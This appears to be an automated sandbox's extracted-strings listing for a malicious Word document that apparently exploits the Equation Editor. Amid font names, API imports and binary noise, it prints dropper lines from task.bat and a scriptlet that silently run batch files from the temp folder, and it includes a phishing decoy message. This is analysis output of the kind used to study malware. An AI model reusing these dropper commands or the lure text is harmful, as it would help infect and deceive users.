Ansi based on PCAP Processing (network.pcap)

i_______

Ansi based on Image Processing (screen_3.png)

IBM Security Department

Ansi based on Dropped File (decoy.doc)

ick between elements to

Unicode based on Memory/File Scan (EQNEDT32.EXE , 00018086-00002012.00000002.24579.00469000.00000002.mdmp)

ience, Inc.

Unicode based on Memory/File Scan (EQNEDT32.EXE , 00018086-00002012.00000002.24579.00469000.00000002.mdmp)

IETldDllVersionHigh

Unicode based on Runtime Data (WINWORD.EXE )

IETldDllVersionLow

Unicode based on Runtime Data (WINWORD.EXE )

IETldVersionHigh

Unicode based on Runtime Data (WINWORD.EXE )

IETldVersionLow

Unicode based on Runtime Data (WINWORD.EXE )

IF EXIST %uu% (exit) ELSE (set uu="%TMp%\block.txt" & copy NUL %uu% & start /b %TMp%\2nd.bat)

Ansi based on Dropped File (task.bat)

ig@X6_]7~

Ansi based on Dropped File (~WRC0000.tmp)

ign &Right

Unicode based on Memory/File Scan (EQNEDT32.EXE , 00018086-00002012.00000002.24579.00469000.00000002.mdmp)

imm32.dll

Ansi based on Hybrid Analysis (EQNEDT32.EXE , 00018086-00002012.00000002.24579.00401000.00000020.mdmp)

ImmAssociateContext

Ansi based on Hybrid Analysis (EQNEDT32.EXE , 00018086-00002012.00000002.24579.00401000.00000020.mdmp)

ImmGetCompositionStringA

Ansi based on Hybrid Analysis (EQNEDT32.EXE , 00018086-00002012.00000002.24579.00401000.00000020.mdmp)

ImmGetContext

Ansi based on Hybrid Analysis (EQNEDT32.EXE , 00018086-00002012.00000002.24579.00401000.00000020.mdmp)

ImmGetConversionStatus

Ansi based on Hybrid Analysis (EQNEDT32.EXE , 00018086-00002012.00000002.24579.00401000.00000020.mdmp)

ImmGetOpenStatus

Ansi based on Hybrid Analysis (EQNEDT32.EXE , 00018086-00002012.00000002.24579.00401000.00000020.mdmp)

ImmNotifyIME

Ansi based on Hybrid Analysis (EQNEDT32.EXE , 00018086-00002012.00000002.24579.00401000.00000020.mdmp)

ImmReleaseContext

Ansi based on Hybrid Analysis (EQNEDT32.EXE , 00018086-00002012.00000002.24579.00401000.00000020.mdmp)

ImmSetCompositionFontA

Ansi based on Hybrid Analysis (EQNEDT32.EXE , 00018086-00002012.00000002.24579.00401000.00000020.mdmp)

ImmSetCompositionWindow

Ansi based on Hybrid Analysis (EQNEDT32.EXE , 00018086-00002012.00000002.24579.00401000.00000020.mdmp)

ImmSetOpenStatus

Ansi based on Hybrid Analysis (EQNEDT32.EXE , 00018086-00002012.00000002.24579.00401000.00000020.mdmp)

Impact

Unicode based on Runtime Data (WINWORD.EXE )

Imprint MT Shadow

Unicode based on Runtime Data (WINWORD.EXE )

In-situ Equation

Ansi based on Hybrid Analysis (EQNEDT32.EXE , 00018086-00002012.00000002.24579.00401000.00000020.mdmp)

In_ik

Ansi based on Image Processing (screen_3.png)

Informal Roman

Unicode based on Runtime Data (WINWORD.EXE )

inner1 pt space

Unicode based on Memory/File Scan (EQNEDT32.EXE , 00018086-00002012.00000002.24579.00469000.00000002.mdmp)

integral

Unicode based on Memory/File Scan (EQNEDT32.EXE , 00018086-00002012.00000002.24579.00469000.00000002.mdmp)

Integral with subscript limit

Unicode based on Memory/File Scan (EQNEDT32.EXE , 00018086-00002012.00000002.24579.00469000.00000002.mdmp)

InterlockedCompareExchange

Ansi based on Memory/File Scan (exe.exe , 00018163-00002300.00000002.24655.0040B000.00000080.mdmp)

InterlockedExchange

Ansi based on Memory/File Scan (exe.exe , 00018163-00002300.00000002.24655.0040B000.00000080.mdmp)

IntranetName

Unicode based on Runtime Data (WINWORD.EXE )

ion . . . . . .

Unicode based on Memory/File Scan (EQNEDT32.EXE , 00018086-00002012.00000002.24579.00469000.00000002.mdmp)

IrisUPC

Unicode based on Runtime Data (WINWORD.EXE )

IsBadReadPtr

Ansi based on Memory/File Scan (EQNEDT32.EXE , 00018086-00002012.00000002.24579.00464000.00000004.mdmp)

IsDBCSLeadByte

Ansi based on Memory/File Scan (EQNEDT32.EXE , 00018086-00002012.00000002.24579.00464000.00000004.mdmp)

IsDebuggerPresent

Ansi based on Memory/File Scan (exe.exe , 00018163-00002300.00000002.24655.0040B000.00000080.mdmp)

Iskoola Pota

Unicode based on Runtime Data (WINWORD.EXE )

Italic

Unicode based on Memory/File Scan (EQNEDT32.EXE , 00018086-00002012.00000002.24579.00469000.00000002.mdmp)

Item 1

Unicode based on Runtime Data (WINWORD.EXE )

Item 10

Unicode based on Runtime Data (WINWORD.EXE )

Item 11

Unicode based on Runtime Data (WINWORD.EXE )

Item 12

Unicode based on Runtime Data (WINWORD.EXE )

Item 13

Unicode based on Runtime Data (WINWORD.EXE )

Item 14

Unicode based on Runtime Data (WINWORD.EXE )

Item 15

Unicode based on Runtime Data (WINWORD.EXE )

Item 16

Unicode based on Runtime Data (WINWORD.EXE )

Item 17

Unicode based on Runtime Data (WINWORD.EXE )

Item 18

Unicode based on Runtime Data (WINWORD.EXE )

Item 19

Unicode based on Runtime Data (WINWORD.EXE )

Item 2

Unicode based on Runtime Data (WINWORD.EXE )

Item 20

Unicode based on Runtime Data (WINWORD.EXE )

Item 21

Unicode based on Runtime Data (WINWORD.EXE )

Item 22

Unicode based on Runtime Data (WINWORD.EXE )

Item 23

Unicode based on Runtime Data (WINWORD.EXE )

Item 24

Unicode based on Runtime Data (WINWORD.EXE )

Item 25

Unicode based on Runtime Data (WINWORD.EXE )

Item 26

Unicode based on Runtime Data (WINWORD.EXE )

Item 27

Unicode based on Runtime Data (WINWORD.EXE )

Item 28

Unicode based on Runtime Data (WINWORD.EXE )

Item 29

Unicode based on Runtime Data (WINWORD.EXE )

Item 3

Unicode based on Runtime Data (WINWORD.EXE )

Item 30

Unicode based on Runtime Data (WINWORD.EXE )

Item 31

Unicode based on Runtime Data (WINWORD.EXE )

Item 32

Unicode based on Runtime Data (WINWORD.EXE )

Item 33

Unicode based on Runtime Data (WINWORD.EXE )

Item 34

Unicode based on Runtime Data (WINWORD.EXE )

Item 35

Unicode based on Runtime Data (WINWORD.EXE )

Item 36

Unicode based on Runtime Data (WINWORD.EXE )

Item 37

Unicode based on Runtime Data (WINWORD.EXE )

Item 38

Unicode based on Runtime Data (WINWORD.EXE )

Item 39

Unicode based on Runtime Data (WINWORD.EXE )

Item 4

Unicode based on Runtime Data (WINWORD.EXE )

Item 40

Unicode based on Runtime Data (WINWORD.EXE )

Item 41

Unicode based on Runtime Data (WINWORD.EXE )

Item 42

Unicode based on Runtime Data (WINWORD.EXE )

Item 43

Unicode based on Runtime Data (WINWORD.EXE )

Item 44

Unicode based on Runtime Data (WINWORD.EXE )

Item 45

Unicode based on Runtime Data (WINWORD.EXE )

Item 46

Unicode based on Runtime Data (WINWORD.EXE )

Item 47

Unicode based on Runtime Data (WINWORD.EXE )

Item 48

Unicode based on Runtime Data (WINWORD.EXE )

Item 49

Unicode based on Runtime Data (WINWORD.EXE )

Item 5

Unicode based on Runtime Data (WINWORD.EXE )

Item 50

Unicode based on Runtime Data (WINWORD.EXE )

Item 6

Unicode based on Runtime Data (WINWORD.EXE )

Item 7

Unicode based on Runtime Data (WINWORD.EXE )

Item 8

Unicode based on Runtime Data (WINWORD.EXE )

Item 9

Unicode based on Runtime Data (WINWORD.EXE )

j(~z+DJ$Hfy|k?nFco"}'!> 1$F"eH\fU3w)XPK!N#;m:word/styles.xmls8oLNNecMq 7I[0!``7VHSf8=:TxF$t"oYn"{` `oI&<X/t*xY,\fXd?vQTV2_(Vf^X&O2E[{kwkw:L28rba(VAs1/cGg:o`BLn/,G;y5)t'R<W} 7kT%O-lH${29YU{[kEv:&op]IEI9b998[@;;bgtAC@\S2\x7o.23He'MUw+\}/,z LmD

Ansi based on Dropped File (~WRC0000.tmp)

j@@jS

Ansi based on Dropped File (exe.exe.634531026)

JanFebMarAprMayJunJulAugSepOctNovDec

Ansi based on Memory/File Scan (EQNEDT32.EXE , 00018086-00002012.00000002.24579.00453000.00000002.mdmp)

JasmineUPC

Unicode based on Runtime Data (WINWORD.EXE )

jC^;>0Tc-^4L

Ansi based on Dropped File (~WRC0000.tmp)

Jokerman

Unicode based on Runtime Data (WINWORD.EXE )

Juice ITC

Unicode based on Runtime Data (WINWORD.EXE )

JvJcP._p_ac_

Ansi based on Image Processing (screen_6.png)

K@Nm}/k)FLzc<q(a,.i&6Br{a->79-G.rjs4):S)j(T0!vAAGo14/Yi*jykJ2YAzaN^}H+|:a(t^lXI9A5Yt'LmZ^w9 g.=E\rG;mYyXZQOr<@: 4@-=,,.s2[7^

Ansi based on Dropped File (~WRC0000.tmp)

KaiTi

Unicode based on Runtime Data (WINWORD.EXE )

Kalinga

Unicode based on Runtime Data (WINWORD.EXE )

Kartika

Unicode based on Runtime Data (WINWORD.EXE )

kCc!oX?I.vO

Ansi based on Dropped File (~WRC0000.tmp)

KERNEL32.dll

Ansi based on Memory/File Scan (exe.exe , 00018163-00002300.00000002.24655.0040B000.00000080.mdmp)

Khmer UI

Unicode based on Runtime Data (WINWORD.EXE )

KodchiangUPC

Unicode based on Runtime Data (WINWORD.EXE )

Kokila

Unicode based on Runtime Data (WINWORD.EXE )

Kristen ITC

Unicode based on Runtime Data (WINWORD.EXE )

Kunstler Script

Unicode based on Runtime Data (WINWORD.EXE )

l . . . . . . .

Unicode based on Memory/File Scan (EQNEDT32.EXE , 00018086-00002012.00000002.24579.00469000.00000002.mdmp)

l4a.k .

Ansi based on Dropped File (decoy.doc)

Labeled arrow templates!Products and set theory templates

Unicode based on Memory/File Scan (EQNEDT32.EXE , 00018086-00002012.00000002.24579.00469000.00000002.mdmp)

Language:

Unicode based on Memory/File Scan (EQNEDT32.EXE , 00018086-00002012.00000002.24579.00469000.00000002.mdmp)

LanguageList

Unicode based on Runtime Data (WINWORD.EXE )

Lao UI

Unicode based on Runtime Data (WINWORD.EXE )

larges the application window to full sizeNot available - the window is zoomed to its maximum size

Unicode based on Memory/File Scan (EQNEDT32.EXE , 00018086-00002012.00000002.24579.00469000.00000002.mdmp)

LastPurgeTime

Unicode based on Runtime Data (WINWORD.EXE )

Latha

Unicode based on Runtime Data (WINWORD.EXE )

LCGreek

Ansi based on Memory/File Scan (EQNEDT32.EXE , 00018086-00002012.00000002.24579.00454000.00000004.mdmp)

LCMapStringA

Ansi based on Memory/File Scan (EQNEDT32.EXE , 00018086-00002012.00000002.24579.00464000.00000004.mdmp)

LCMapStringW

Ansi based on Memory/File Scan (EQNEDT32.EXE , 00018086-00002012.00000002.24579.00464000.00000004.mdmp)

le&arDelete

Unicode based on Memory/File Scan (EQNEDT32.EXE , 00018086-00002012.00000002.24579.00469000.00000002.mdmp)

Leelawadee

Unicode based on Runtime Data (WINWORD.EXE )

Let's Encrypt Authority X30

Ansi based on PCAP Processing (network.pcap)

Let's Encrypt1#0!

Ansi based on PCAP Processing (network.pcap)

Levenim MT

Unicode based on Runtime Data (WINWORD.EXE )

lign at &%

Unicode based on Memory/File Scan (EQNEDT32.EXE , 00018086-00002012.00000002.24579.00469000.00000002.mdmp)

lign:

Unicode based on Memory/File Scan (EQNEDT32.EXE , 00018086-00002012.00000002.24579.00469000.00000002.mdmp)

LilyUPC

Unicode based on Runtime Data (WINWORD.EXE )

LimDepth

Ansi based on Memory/File Scan (EQNEDT32.EXE , 00018086-00002012.00000002.24579.00454000.00000004.mdmp)

LimHeight

Ansi based on Memory/File Scan (EQNEDT32.EXE , 00018086-00002012.00000002.24579.00454000.00000004.mdmp)

LimLineSpacing

Ansi based on Memory/File Scan (EQNEDT32.EXE , 00018086-00002012.00000002.24579.00454000.00000004.mdmp)

Line spacing

Unicode based on Memory/File Scan (EQNEDT32.EXE , 00018086-00002012.00000002.24579.00469000.00000002.mdmp)

LineSpacing

Ansi based on Memory/File Scan (EQNEDT32.EXE , 00018086-00002012.00000002.24579.00454000.00000004.mdmp)

LoadLibraryA

Ansi based on Memory/File Scan (EQNEDT32.EXE , 00018086-00002012.00000002.24579.00464000.00000004.mdmp)

LoadResource

Ansi based on Memory/File Scan (EQNEDT32.EXE , 00018086-00002012.00000002.24579.00464000.00000004.mdmp)

LocalAlloc

Ansi based on Memory/File Scan (EQNEDT32.EXE , 00018086-00002012.00000002.24579.00464000.00000004.mdmp)

LocalFree

Ansi based on Memory/File Scan (EQNEDT32.EXE , 00018086-00002012.00000002.24579.00464000.00000004.mdmp)

LocalLock

Ansi based on Memory/File Scan (EQNEDT32.EXE , 00018086-00002012.00000002.24579.00464000.00000004.mdmp)

LocalReAlloc

Ansi based on Memory/File Scan (EQNEDT32.EXE , 00018086-00002012.00000002.24579.00464000.00000004.mdmp)

LocalUnlock

Ansi based on Memory/File Scan (EQNEDT32.EXE , 00018086-00002012.00000002.24579.00464000.00000004.mdmp)

LockResource

Ansi based on Memory/File Scan (EQNEDT32.EXE , 00018086-00002012.00000002.24579.00464000.00000004.mdmp)

lstrcmpA

Ansi based on Memory/File Scan (EQNEDT32.EXE , 00018086-00002012.00000002.24579.00464000.00000004.mdmp)

lstrcmpiA

Ansi based on Memory/File Scan (EQNEDT32.EXE , 00018086-00002012.00000002.24579.00464000.00000004.mdmp)

lstrcpyA

Ansi based on Memory/File Scan (EQNEDT32.EXE , 00018086-00002012.00000002.24579.00464000.00000004.mdmp)

lstrlenA

Ansi based on Memory/File Scan (EQNEDT32.EXE , 00018086-00002012.00000002.24579.00464000.00000004.mdmp)

LT@k(

Ansi based on Dropped File (exe.exe.634531026)

Lucida Bright

Unicode based on Runtime Data (WINWORD.EXE )

Lucida Calligraphy

Unicode based on Runtime Data (WINWORD.EXE )

Lucida Console

Unicode based on Runtime Data (WINWORD.EXE )

Lucida Fax

Unicode based on Runtime Data (WINWORD.EXE )

Lucida Handwriting

Unicode based on Runtime Data (WINWORD.EXE )

Lucida Sans

Unicode based on Runtime Data (WINWORD.EXE )

Lucida Sans Typewriter

Unicode based on Runtime Data (WINWORD.EXE )

Lucida Sans Unicode

Unicode based on Runtime Data (WINWORD.EXE )

l|Go:Ht<y%f.Kul16Z=I0{L`HS\CCop#O:7SiVP]KGrh$BFtZy]O+,{juZqBiit,$-my{q7HJL{PE/Fq$>

Ansi based on Dropped File (~WRC0000.tmp)

M4|/99:4j>PK!l~5%word/glossary/_rels/document.xml.relsMO0H(wn|

Ansi based on Dropped File (~WRC0000.tmp)

M9;c:}tQY}qdF!Vd!57~m$

Ansi based on Dropped File (~WRC0000.tmp)

m;cr0c0ttw0rd

Ansi based on Image Processing (screen_6.png)

Mac PICT

Ansi based on Hybrid Analysis (EQNEDT32.EXE , 00018086-00002012.00000002.24579.00401000.00000020.mdmp)

Macro Insertion

Unicode based on Memory/File Scan (EQNEDT32.EXE , 00018086-00002012.00000002.24579.00469000.00000002.mdmp)

Magneto

Unicode based on Runtime Data (WINWORD.EXE )

Magnification

Unicode based on Memory/File Scan (EQNEDT32.EXE , 00018086-00002012.00000002.24579.00469000.00000002.mdmp)

Maiandra GD

Unicode based on Runtime Data (WINWORD.EXE )

Mailing_

Ansi based on Image Processing (screen_3.png)

Mailingc

Ansi based on Image Processing (screen_6.png)

MainMTWin

Ansi based on Hybrid Analysis (EQNEDT32.EXE , 00018086-00002012.00000002.24579.00401000.00000020.mdmp)

MainWinProc

Ansi based on Memory/File Scan (EQNEDT32.EXE , 00018086-00002012.00000002.24579.00453000.00000002.mdmp)

Malgun Gothic

Unicode based on Runtime Data (WINWORD.EXE )

Mangal

Unicode based on Runtime Data (WINWORD.EXE )

Marlett

Unicode based on Runtime Data (WINWORD.EXE )

MathLanguage

Ansi based on Hybrid Analysis (EQNEDT32.EXE , 00018086-00002012.00000002.24579.00401000.00000020.mdmp)

MathType

Ansi based on Hybrid Analysis (EQNEDT32.EXE , 00018086-00002012.00000002.24579.00401000.00000020.mdmp)

MatrixColSpacing

Ansi based on Memory/File Scan (EQNEDT32.EXE , 00018086-00002012.00000002.24579.00454000.00000004.mdmp)

MatrixRowSpacing

Ansi based on Memory/File Scan (EQNEDT32.EXE , 00018086-00002012.00000002.24579.00454000.00000004.mdmp)

Matura MT Script Capitals

Unicode based on Runtime Data (WINWORD.EXE )

Max Display

Unicode based on Runtime Data (WINWORD.EXE )

MaxFileSize

Unicode based on Runtime Data (exe.exe )

Meiryo

Unicode based on Runtime Data (WINWORD.EXE )

Meiryo UI

Unicode based on Runtime Data (WINWORD.EXE )

MessageBoxA

Ansi based on Hybrid Analysis (EQNEDT32.EXE , 00018086-00002012.00000002.24579.00401000.00000020.mdmp)

MFEnumFunc

Ansi based on Memory/File Scan (EQNEDT32.EXE , 00018086-00002012.00000002.24579.00453000.00000002.mdmp)

MH_Wa_

Ansi based on Image Processing (screen_3.png)

Microsoft Himalaya

Unicode based on Runtime Data (WINWORD.EXE )

Microsoft JhengHei

Unicode based on Runtime Data (WINWORD.EXE )

Microsoft New Tai Lue

Unicode based on Runtime Data (WINWORD.EXE )

Microsoft PhagsPa

Unicode based on Runtime Data (WINWORD.EXE )

Microsoft Sans Serif

Unicode based on Runtime Data (WINWORD.EXE )

Microsoft Tai Le

Unicode based on Runtime Data (WINWORD.EXE )

Microsoft Uighur

Unicode based on Runtime Data (WINWORD.EXE )

Microsoft Visual C++ Runtime Library

Ansi based on Hybrid Analysis (EQNEDT32.EXE , 00018086-00002012.00000002.24579.00401000.00000020.mdmp)

Microsoft YaHei

Unicode based on Runtime Data (WINWORD.EXE )

Microsoft Yi Baiti

Unicode based on Runtime Data (WINWORD.EXE )

MinGap

Ansi based on Memory/File Scan (EQNEDT32.EXE , 00018086-00002012.00000002.24579.00454000.00000004.mdmp)

MingLiU

Unicode based on Runtime Data (WINWORD.EXE )

MingLiU-ExtB

Unicode based on Runtime Data (WINWORD.EXE )

MingLiU_HKSCS

Unicode based on Runtime Data (WINWORD.EXE )

MingLiU_HKSCS-ExtB

Unicode based on Runtime Data (WINWORD.EXE )

Miriam

Unicode based on Runtime Data (WINWORD.EXE )

Miriam Fixed

Unicode based on Runtime Data (WINWORD.EXE )

Missing Resource: type='%d', ID=%d'.

Ansi based on Hybrid Analysis (EQNEDT32.EXE , 00018086-00002012.00000002.24579.00401000.00000020.mdmp)

Mistral

Unicode based on Runtime Data (WINWORD.EXE )

Modern No. 20

Unicode based on Runtime Data (WINWORD.EXE )

Mongolian Baiti

Unicode based on Runtime Data (WINWORD.EXE )

Monotype Corsiva

Unicode based on Runtime Data (WINWORD.EXE )

MoolBoran

Unicode based on Runtime Data (WINWORD.EXE )

MoveFileA

Ansi based on Memory/File Scan (EQNEDT32.EXE , 00018086-00002012.00000002.24579.00464000.00000004.mdmp)

MS Gothic

Unicode based on Runtime Data (WINWORD.EXE )

MS Mincho

Unicode based on Runtime Data (WINWORD.EXE )

MS Outlook

Unicode based on Runtime Data (WINWORD.EXE )

MS PGothic

Unicode based on Runtime Data (WINWORD.EXE )

MS PMincho

Unicode based on Runtime Data (WINWORD.EXE )

MS Reference Sans Serif

Unicode based on Runtime Data (WINWORD.EXE )

MS Reference Specialty

Unicode based on Runtime Data (WINWORD.EXE )

MS Serif

Ansi based on Hybrid Analysis (EQNEDT32.EXE , 00018086-00002012.00000002.24579.00401000.00000020.mdmp)

MS UI Gothic

Unicode based on Runtime Data (WINWORD.EXE )

msi.dll

Ansi based on Hybrid Analysis (EQNEDT32.EXE , 00018086-00002012.00000002.24579.00401000.00000020.mdmp)

MsiProvideQualifiedComponentA

Ansi based on Hybrid Analysis (EQNEDT32.EXE , 00018086-00002012.00000002.24579.00401000.00000020.mdmp)

MSOBALLOON

Unicode based on Runtime Data (WINWORD.EXE )

MsoCommandBarPopup

Unicode based on Runtime Data (WINWORD.EXE )

MsoHelp10

Unicode based on Runtime Data (WINWORD.EXE )

mspim_wnd32

Unicode based on Runtime Data (WINWORD.EXE )

MSWordDocWord.Document.89q

Ansi based on Dropped File (decoy.doc)

MT Extra

Ansi based on Hybrid Analysis (EQNEDT32.EXE , 00018086-00002012.00000002.24579.00401000.00000020.mdmp)

MT ExtraText (FE)

Unicode based on Memory/File Scan (EQNEDT32.EXE , 00018086-00002012.00000002.24579.00469000.00000002.mdmp)

MT Symbol

Ansi based on Hybrid Analysis (EQNEDT32.EXE , 00018086-00002012.00000002.24579.00401000.00000020.mdmp)

MT Symbol Italic

Ansi based on Memory/File Scan (EQNEDT32.EXE , 00018086-00002012.00000002.24579.00454000.00000004.mdmp)

MT%s.TMP

Ansi based on Hybrid Analysis (EQNEDT32.EXE , 00018086-00002012.00000002.24579.00401000.00000020.mdmp)

MT-Symbol

Ansi based on Hybrid Analysis (EQNEDT32.EXE , 00018086-00002012.00000002.24579.00401000.00000020.mdmp)

MtInsituFilterClass

Ansi based on Hybrid Analysis (EQNEDT32.EXE , 00018086-00002012.00000002.24579.00401000.00000020.mdmp)

MtInsituWndProc

Ansi based on Memory/File Scan (EQNEDT32.EXE , 00018086-00002012.00000002.24579.00453000.00000002.mdmp)

MTUpgradeDialog

Ansi based on Hybrid Analysis (EQNEDT32.EXE , 00018086-00002012.00000002.24579.00401000.00000020.mdmp)

mUa#eFh$MFhDFhwD##(\,j6caw

Ansi based on Dropped File (~WRC0000.tmp)

MulDiv

Ansi based on Memory/File Scan (EQNEDT32.EXE , 00018086-00002012.00000002.24579.00464000.00000004.mdmp)

MultiByteToWideChar

Ansi based on Memory/File Scan (EQNEDT32.EXE , 00018086-00002012.00000002.24579.00464000.00000004.mdmp)

MV Boli

Unicode based on Runtime Data (WINWORD.EXE )

M{DB%J+{lC]=5

Ansi based on Dropped File (~WRC0000.tmp)

N'2ufG

Ansi based on Dropped File (~WRC0000.tmp)

n't UndoCtrl+Z

Unicode based on Memory/File Scan (EQNEDT32.EXE , 00018086-00002012.00000002.24579.00469000.00000002.mdmp)

N/%qR2kj3S~M6b}}^?*y)#-5Jzy_iBmF9F|^?X|dijMXQIXz_j(QQDI8,DM&dH8:O<q86\x;]WVhA6w{0xXQVGe/y1Vu_}HlP%hC:8+#3TyqHqC/aPK!0C)word/theme/theme1.xmlYOo6w toc'vu-MniP@I}ama[4:lGRX^6>$!)O^rC$y@/yH*)UDb`}"qJX^)I`nEp)liV[]1M<OP6r=zgbIguSebORDqugZo~lAplxpT0+[}`jzAV2Fi@qv5\|NleXdsjcs7f

Ansi based on Dropped File (~WRC0000.tmp)

N6/dok`

Ansi based on Dropped File (~WRC0000.tmp)

Narkisim

Unicode based on Runtime Data (WINWORD.EXE )

Native

Ansi based on Hybrid Analysis (EQNEDT32.EXE , 00018086-00002012.00000002.24579.00401000.00000020.mdmp)

ndVgqr^L8T2$tzv^\8D,e$|I(m,

Ansi based on Dropped File (~WRC0000.tmp)

NetUICtrlNotifySink

Unicode based on Runtime Data (WINWORD.EXE )

NextUpdate

Unicode based on Runtime Data (WINWORD.EXE )

Niagara Engraved

Unicode based on Runtime Data (WINWORD.EXE )

Niagara Solid

Unicode based on Runtime Data (WINWORD.EXE )

NINSITUCLASS

Unicode based on Memory/File Scan (EQNEDT32.EXE , 00018086-00002012.00000002.24579.00454000.00000004.mdmp)

Normal subgroup

Unicode based on Memory/File Scan (EQNEDT32.EXE , 00018086-00002012.00000002.24579.00469000.00000002.mdmp)

Not yet implemented.

Unicode based on Memory/File Scan (EQNEDT32.EXE , 00018086-00002012.00000002.24579.00469000.00000002.mdmp)

nown filename extension.

Unicode based on Memory/File Scan (EQNEDT32.EXE , 00018086-00002012.00000002.24579.00469000.00000002.mdmp)

NSimSun

Unicode based on Runtime Data (WINWORD.EXE )

Number

Ansi based on Memory/File Scan (EQNEDT32.EXE , 00018086-00002012.00000002.24579.00454000.00000004.mdmp)

NumerHeight

Ansi based on Memory/File Scan (EQNEDT32.EXE , 00018086-00002012.00000002.24579.00454000.00000004.mdmp)

Nyala

Unicode based on Runtime Data (WINWORD.EXE )

object

Ansi based on Memory/File Scan (EQNEDT32.EXE , 00018086-00002012.00000002.24579.00454000.00000004.mdmp)

Object Descriptor

Ansi based on Hybrid Analysis (EQNEDT32.EXE , 00018086-00002012.00000002.24579.00401000.00000020.mdmp)

ObjInfoLinkInfoFF82%TMp%\InTeLdRiVeRuPd1.ScTu~*Ff`7

Ansi based on Hybrid Analysis (5635DF453843.doc.bin)

ObjShell.Run "CmD /C %TeMp%\TaSk.BaT",0,True

Ansi based on Dropped File (inteldriverupd1.sct)

OCR A Extended

Unicode based on Runtime Data (WINWORD.EXE )

off_-ce_

Ansi based on Image Processing (screen_0.png)

OfficeTooltip

Unicode based on Runtime Data (WINWORD.EXE )

OfficeUILanguage

Ansi based on Hybrid Analysis (EQNEDT32.EXE , 00018086-00002012.00000002.24579.00401000.00000020.mdmp)

Old English Text MT

Unicode based on Runtime Data (WINWORD.EXE )

OleObjSetExtent called; x = %d, y = %d

Ansi based on Hybrid Analysis (EQNEDT32.EXE , 00018086-00002012.00000002.24579.00401000.00000020.mdmp)

OLEStartupAsServer

Ansi based on Hybrid Analysis (EQNEDT32.EXE , 00018086-00002012.00000002.24579.00401000.00000020.mdmp)

oolbar

Unicode based on Memory/File Scan (EQNEDT32.EXE , 00018086-00002012.00000002.24579.00469000.00000002.mdmp)

OpenFile

Ansi based on Memory/File Scan (EQNEDT32.EXE , 00018086-00002012.00000002.24579.00464000.00000004.mdmp)

Other Size

Unicode based on Memory/File Scan (EQNEDT32.EXE , 00018086-00002012.00000002.24579.00469000.00000002.mdmp)

Other Style

Unicode based on Memory/File Scan (EQNEDT32.EXE , 00018086-00002012.00000002.24579.00469000.00000002.mdmp)

Other styles

Unicode based on Memory/File Scan (EQNEDT32.EXE , 00018086-00002012.00000002.24579.00469000.00000002.mdmp)

OutputDebugStringA

Ansi based on Memory/File Scan (EQNEDT32.EXE , 00018086-00002012.00000002.24579.00464000.00000004.mdmp)

Over-bar

Unicode based on Memory/File Scan (EQNEDT32.EXE , 00018086-00002012.00000002.24579.00469000.00000002.mdmp)

OwnerLink

Ansi based on Hybrid Analysis (EQNEDT32.EXE , 00018086-00002012.00000002.24579.00401000.00000020.mdmp)

Pa9iL_0ut

Ansi based on Image Processing (screen_6.png)

Package

Unicode based on Runtime Data (WINWORD.EXE )

PagiLayaut

Ansi based on Image Processing (screen_3.png)

Palace Script MT

Unicode based on Runtime Data (WINWORD.EXE )

Palatino Linotype

Unicode based on Runtime Data (WINWORD.EXE )

Papyrus

Unicode based on Runtime Data (WINWORD.EXE )

Paragraph

Ansi based on Image Processing (screen_6.png)

ParamDlgProc

Ansi based on Memory/File Scan (EQNEDT32.EXE , 00018086-00002012.00000002.24579.00453000.00000002.mdmp)

Parchment

Unicode based on Runtime Data (WINWORD.EXE )

partition lines.

Unicode based on Memory/File Scan (EQNEDT32.EXE , 00018086-00002012.00000002.24579.00469000.00000002.mdmp)

Patti

Ansi based on Image Processing (screen_6.png)

pdateF3

Unicode based on Memory/File Scan (EQNEDT32.EXE , 00018086-00002012.00000002.24579.00469000.00000002.mdmp)

Perpendicular toUnderscore

Unicode based on Memory/File Scan (EQNEDT32.EXE , 00018086-00002012.00000002.24579.00469000.00000002.mdmp)

Perpetua

Unicode based on Runtime Data (WINWORD.EXE )

Perpetua Titling MT

Unicode based on Runtime Data (WINWORD.EXE )

PIhW,|fdCZ8`iFOYt#E

Ansi based on Dropped File (~WRC0000.tmp)

PK!+:P[Content_Types].xml (n0ED(,g6@]t#_0}QMl15YS@D]I[kUSx-76Ve'Qn

Ansi based on Dropped File (~WRC0000.tmp)

Plantagenet Cherokee

Unicode based on Runtime Data (WINWORD.EXE )

Playbill

Unicode based on Runtime Data (WINWORD.EXE )

Please carefully examine log file sample and take action to prevent harmful traffic coming from your IP space.

Ansi based on Dropped File (decoy.doc)

PMingLiU

Unicode based on Runtime Data (WINWORD.EXE )

PMingLiU-ExtB

Unicode based on Runtime Data (WINWORD.EXE )

pMJci(EX

Ansi based on PCAP Processing (network.pcap)

Poor Richard

Unicode based on Runtime Data (WINWORD.EXE )

PopupMenuWinProc

Ansi based on Memory/File Scan (EQNEDT32.EXE , 00018086-00002012.00000002.24579.00453000.00000002.mdmp)

Prime Height

Unicode based on Memory/File Scan (EQNEDT32.EXE , 00018086-00002012.00000002.24579.00469000.00000002.mdmp)

PrimeHeight

Ansi based on Memory/File Scan (EQNEDT32.EXE , 00018086-00002012.00000002.24579.00454000.00000004.mdmp)

Pristina

Unicode based on Runtime Data (WINWORD.EXE )

ProductFiles

Unicode based on Runtime Data (WINWORD.EXE )

ProductName

Unicode based on Memory/File Scan (EQNEDT32.EXE , 00018086-00002012.00000002.24579.00469000.00000002.mdmp)

ProductNonBootFilesIntl_1033

Unicode based on Runtime Data (WINWORD.EXE )

progid="fjzmpcjvqp"

Ansi based on Dropped File (inteldriverupd1.sct)

ProxyBypass

Unicode based on Runtime Data (WINWORD.EXE )

ProxyEnable

Unicode based on Runtime Data (WINWORD.EXE )

ProxyOverride

Unicode based on Runtime Data (WINWORD.EXE )

ProxyServer

Unicode based on Runtime Data (WINWORD.EXE )

q vh{nx=rbxpBwA3Q|&^7;l,{>4".7*YIK8_ummmhE#-U9ib_+IS(5m&gk]b

Ansi based on Dropped File (~WRC0000.tmp)

Q+ONQ&,A!@cOJ*]2`:@1xaC

Ansi based on Dropped File (~WRC0000.tmp)

qual column &widths

Unicode based on Memory/File Scan (EQNEDT32.EXE , 00018086-00002012.00000002.24579.00469000.00000002.mdmp)

qual row heights

Unicode based on Memory/File Scan (EQNEDT32.EXE , 00018086-00002012.00000002.24579.00469000.00000002.mdmp)

QueryPerformanceCounter

Ansi based on Memory/File Scan (exe.exe , 00018163-00002300.00000002.24655.0040B000.00000080.mdmp)

Qw,T}LncIYFYl/XqVB^Fp2lo4X(|N1l>`f+gg<:_V=Y

Ansi based on Dropped File (~WRC0000.tmp)

QWDWIzI}4e+*b|:0sEpw{XuTZ?ej(dTdNe_\0)}c>V[*?2#

